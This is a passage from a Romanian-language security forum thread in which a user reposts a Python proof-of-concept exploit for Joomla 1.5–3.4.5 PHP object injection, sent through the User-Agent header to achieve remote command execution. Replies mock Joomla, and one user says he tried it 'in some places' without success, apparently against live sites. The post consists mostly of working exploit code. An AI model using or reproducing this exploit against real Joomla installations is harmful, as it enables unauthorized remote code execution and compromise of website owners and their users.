Nytro Posted December 15, 2015 Report Share Posted December 15, 2015 [h=1]Joomla 1.5 - 3.4.5 - Object Injection Remote Command Execution[/h]''' Simple PoC for Joomla Object Injection. Gary @ Sec-1 ltd http://www.sec-1.com/'''import requests # easy_install requestsdef get_url(url, user_agent): headers = { 'User-Agent': user_agent } cookies = requests.get(url,headers=headers).cookies for _ in range(3): response = requests.get(url, headers=headers,cookies=cookies) return responsedef php_str_noquotes(data): "Convert string to chr(xx).chr(xx) for use in php" encoded = "" for char in data: encoded += "chr({0}).".format(ord(char)) return encoded[:-1]def generate_payload(php_payload): php_payload = "eval({0})".format(php_str_noquotes(php_payload)) terminate = '\xf0\xfd\xfd\xfd'; exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";''' injected_payload = "{};JFactory::getConfig();exit".format(php_payload) exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload) exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate return exploit_templatepl = generate_payload("system('touch /tmp/fx');")print get_url("http://172.31.6.242/", pl)Sursa: https://www.exploit-db.com/exploits/38977/ Quote Link to comment Share on other sites More sharing options...
gogusan Posted December 15, 2015 Report Share Posted December 15, 2015 cea mai scarboasa platforma Quote Link to comment Share on other sites More sharing options...
TheOne Posted December 15, 2015 Report Share Posted December 15, 2015 cea mai scarboasa platformaImportant vulnerabila sa fie Quote Link to comment Share on other sites More sharing options...
Active Members MrGrj Posted December 15, 2015 Active Members Report Share Posted December 15, 2015 Intr-adevar, platforma asta e foarte, foarte proasta. Sunt curios, Nytro, iti aduci aminte sa fii gasit ceva related to Django ? Quote Link to comment Share on other sites More sharing options...
Axu Posted December 16, 2015 Report Share Posted December 16, 2015 L-am incercat si eu prin niste locuri dar fara succes. Voua v-a mers? Quote Link to comment Share on other sites More sharing options...